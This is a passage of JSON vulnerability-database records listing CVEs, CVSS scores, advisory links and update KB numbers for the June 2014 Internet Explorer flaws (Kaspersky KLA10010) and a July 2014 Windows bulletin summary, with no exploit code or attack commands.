"CVE-2014-1764", "CVE-2014-2756", "CVE-2014-1799", "CVE-2014-2772", "CVE-2014-1782", "CVE-2014-1766", "CVE-2014-2765", "CVE-2014-2767", "CVE-2014-1783", "CVE-2014-1800", "CVE-2014-2755", "CVE-2014-1780", "CVE-2014-1795", "CVE-2014-1792", "CVE-2014-1791", "CVE-2014-2763", "CVE-2014-2759", "CVE-2014-2768", "CVE-2014-1788", "CVE-2014-2775", "CVE-2014-2770", "CVE-2014-2769", "CVE-2014-1777", "CVE-2014-1778", "CVE-2014-2773", "CVE-2014-1771", "CVE-2014-1781", "CVE-2014-2764", "CVE-2014-1774", "CVE-2014-1805", "CVE-2014-1779", "CVE-2014-1769"], "description": "### *Detect date*:\n06/10/2014\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Internet Explorer versions 6-11. Malicious users can exploit these vulnerabilities to cause denial of service, execute arbitrary code, bypass a sandbox protection mechanism, obtain sensitive information, modify TLS session data or read local files.\n\n### *Affected products*:\nMicrosoft Internet Explorer versions from 6 to 11.\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[Microsoft bulletin](<https://technet.microsoft.com/library/security/ms14-035>) \n[CVE-2014-1800](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1800>) \n[CVE-2014-1799](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1799>) \n[CVE-2014-1803](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1803>) \n[CVE-2014-1802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1802>) \n[CVE-2014-1805](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1805>) \n[CVE-2014-1804](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1804>) \n[CVE-2014-2754](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-2754>) \n[CVE-2014-2753](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-2753>) \n[CVE-2014-2756](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-2756>) \n[CVE-2014-2755](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-2755>) \n[CVE-2014-2777](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-2777>) \n[CVE-2014-1779](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1779>) \n[CVE-2014-1778](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1778>) \n[CVE-2014-1777](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1777>) \n[CVE-2014-1775](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1775>) \n[CVE-2014-1783](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1783>) \n[CVE-2014-1782](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1782>) \n[CVE-2014-1781](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1781>) \n[CVE-2014-1780](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1780>) \n[CVE-2014-2776](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-2776>) \n[CVE-2014-2775](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-2775>) \n[CVE-2014-1785](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1785>) \n[CVE-2014-1784](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1784>) \n[CVE-2014-2771](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-2771>) \n[CVE-2014-2770](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-2770>) \n[CVE-2014-2769](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-2769>) \n[CVE-2014-2768](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-2768>) \n[CVE-2014-2772](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-2772>) \n[CVE-2014-2773](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-2773>) \n[CVE-2014-2782](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-2782>) \n[CVE-2014-2759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-2759>) \n[CVE-2014-1794](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1794>) \n[CVE-2014-1795](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1795>) \n[CVE-2014-1791](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1791>) \n[CVE-2014-1792](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1792>) \n[CVE-2014-1789](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1789>) \n[CVE-2014-1790](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1790>) \n[CVE-2014-1786](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1786>) \n[CVE-2014-1788](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1788>) \n[CVE-2014-1796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1796>) \n[CVE-2014-1797](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1797>) \n[CVE-2014-0282](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-0282>) \n[CVE-2014-1762](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1762>) \n[CVE-2014-1764](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1764>) \n[CVE-2014-1766](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1766>) \n[CVE-2014-1769](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1769>) \n[CVE-2014-1770](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1770>) \n[CVE-2014-1771](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1771>) \n[CVE-2014-1772](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1772>) \n[CVE-2014-1773](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1773>) \n[CVE-2014-2763](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-2763>) \n[CVE-2014-2764](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-2764>) \n[CVE-2014-2765](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-2765>) \n[CVE-2014-2757](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-2757>) \n[CVE-2014-2758](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-2758>) \n[CVE-2014-1774](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-1774>) \n[CVE-2014-2760](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-2760>) \n[CVE-2014-2761](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-2761>) \n[CVE-2014-2766](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-2766>) \n[CVE-2014-2767](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-2767>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2014-1800](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1800>)9.3Critical \n[CVE-2014-1799](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1799>)9.3Critical \n[CVE-2014-1803](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1803>)9.3Critical \n[CVE-2014-1802](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1802>)9.3Critical \n[CVE-2014-1805](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1805>)9.3Critical \n[CVE-2014-1804](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1804>)9.3Critical \n[CVE-2014-2754](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2754>)9.3Critical \n[CVE-2014-2753](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2753>)9.3Critical \n[CVE-2014-2756](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2756>)9.3Critical \n[CVE-2014-2755](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2755>)9.3Critical \n[CVE-2014-2777](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2777>)7.5Critical \n[CVE-2014-1779](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1779>)9.3Critical \n[CVE-2014-1778](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1778>)6.8High \n[CVE-2014-1777](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1777>)4.3Warning \n[CVE-2014-1775](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1775>)9.3Critical \n[CVE-2014-1783](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1783>)9.3Critical \n[CVE-2014-1782](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1782>)9.3Critical \n[CVE-2014-1781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1781>)9.3Critical \n[CVE-2014-1780](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1780>)9.3Critical \n[CVE-2014-2776](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2776>)9.3Critical \n[CVE-2014-2775](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2775>)9.3Critical \n[CVE-2014-1785](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1785>)9.3Critical \n[CVE-2014-1784](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1784>)9.3Critical \n[CVE-2014-2771](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2771>)9.3Critical \n[CVE-2014-2770](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2770>)9.3Critical \n[CVE-2014-2769](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2769>)9.3Critical \n[CVE-2014-2768](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2768>)9.3Critical \n[CVE-2014-2772](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2772>)9.3Critical \n[CVE-2014-2773](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2773>)9.3Critical \n[CVE-2014-2782](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2782>)9.3Critical \n[CVE-2014-2759](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2759>)9.3Critical \n[CVE-2014-1794](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1794>)9.3Critical \n[CVE-2014-1795](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1795>)9.3Critical \n[CVE-2014-1791](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1791>)9.3Critical \n[CVE-2014-1792](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1792>)9.3Critical \n[CVE-2014-1789](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1789>)9.3Critical \n[CVE-2014-1790](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1790>)9.3Critical \n[CVE-2014-1786](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1786>)9.3Critical \n[CVE-2014-1788](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1788>)9.3Critical \n[CVE-2014-1796](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1796>)9.3Critical \n[CVE-2014-1797](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1797>)9.3Critical \n[CVE-2014-0282](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0282>)9.3Critical \n[CVE-2014-1762](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1762>)7.5Critical \n[CVE-2014-1764](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1764>)10.0Critical \n[CVE-2014-1766](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1766>)7.2High \n[CVE-2014-1769](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1769>)9.3Critical \n[CVE-2014-1770](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1770>)9.3Critical \n[CVE-2014-1771](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1771>)6.8High \n[CVE-2014-1772](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1772>)9.3Critical \n[CVE-2014-1773](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1773>)9.3Critical \n[CVE-2014-2763](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2763>)9.3Critical \n[CVE-2014-2764](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2764>)9.3Critical \n[CVE-2014-2765](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2765>)9.3Critical \n[CVE-2014-2757](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2757>)9.3Critical \n[CVE-2014-2758](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2758>)9.3Critical \n[CVE-2014-1774](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1774>)9.3Critical \n[CVE-2014-2760](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2760>)9.3Critical \n[CVE-2014-2761](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2761>)9.3Critical \n[CVE-2014-2766](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2766>)9.3Critical \n[CVE-2014-2767](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2767>)9.3Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[2963950](<http://support.microsoft.com/kb/2963950>) \n[2969262](<http://support.microsoft.com/kb/2969262>) \n[2957689](<http://support.microsoft.com/kb/2957689>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 40, "modified": "2020-06-18T00:00:00", "published": "2014-06-10T00:00:00", "id": "KLA10010", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10010", "title": "\r KLA10010Multiple vulnerabilities at Microsoft Internet Explorer ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:56", "bulletinFamily": "software", "cvelist": ["CVE-2014-1802", "CVE-2014-1762", "CVE-2014-1773", "CVE-2014-1804", "CVE-2014-2789", "CVE-2014-1790", "CVE-2014-1775", "CVE-2014-2809", "CVE-2014-2761", "CVE-2014-1796", "CVE-2014-2782", "CVE-2014-2803", "CVE-2014-2783", "CVE-2014-1786", "CVE-2014-1797", "CVE-2014-2760", "CVE-2014-1794", "CVE-2014-1811", "CVE-2014-2791", "CVE-2014-2807", "CVE-2014-2802", "CVE-2014-1763", "CVE-2014-1765", "CVE-2014-2757", "CVE-2014-2766", "CVE-2014-1817", "CVE-2014-2776", "CVE-2014-1772", "CVE-2014-2754", "CVE-2014-2804", "CVE-2014-2758", "CVE-2014-1784", "CVE-2014-2792", "CVE-2014-2753", "CVE-2014-0296", "CVE-2014-2813", "CVE-2014-2771", "CVE-2014-2800", "CVE-2014-1785", "CVE-2014-1803", "CVE-2014-1770", "CVE-2014-2777", "CVE-2014-2801", "CVE-2014-0282", "CVE-2014-1789", "CVE-2014-1767", "CVE-2014-1764", "CVE-2014-2756", "CVE-2014-1818", "CVE-2014-1799", "CVE-2014-2797", "CVE-2014-2772", "CVE-2014-1782", "CVE-2014-1766", "CVE-2014-2786", "CVE-2014-2765", "CVE-2014-2767", "CVE-2014-2806", "CVE-2014-1783", "CVE-2014-2781", "CVE-2014-2790", "CVE-2014-2788", "CVE-2014-2780", "CVE-2014-1800", "CVE-2014-2785", "CVE-2014-1816", "CVE-2014-2798", "CVE-2014-2755", "CVE-2014-1824", "CVE-2014-1780", "CVE-2014-2814", "CVE-2014-1795", "CVE-2014-1792", "CVE-2014-2794", "CVE-2014-1791", "CVE-2014-2763", "CVE-2014-2759", "CVE-2014-2795", "CVE-2014-2768", "CVE-2014-1788", "CVE-2014-2775", "CVE-2014-2770", "CVE-2014-2769", "CVE-2014-1777", "CVE-2014-1778", "CVE-2014-2773", "CVE-2014-1771", "CVE-2014-1781", "CVE-2014-2764", "CVE-2014-1774", "CVE-2014-1805", "CVE-2014-1779", "CVE-2014-2787", "CVE-2014-1769"], "description": "RDP weak encryption, TCP DoS, XML libraries information leakage, graphics libraries memory corruptions, Windows Journal memory corruptions, virtual keyboard privilege escalation, ADF privilege escalation, DirectoShow privilege escalation, Microsoft Service Bus DoS, multiple Internet Explorer vulnerabilities.", "edition": 1, "modified": "2014-07-21T00:00:00", "published": "2014-07-21T00:00:00", "id": "SECURITYVULNS:VULN:13860", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13860", "title": "Microsoft Windows multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}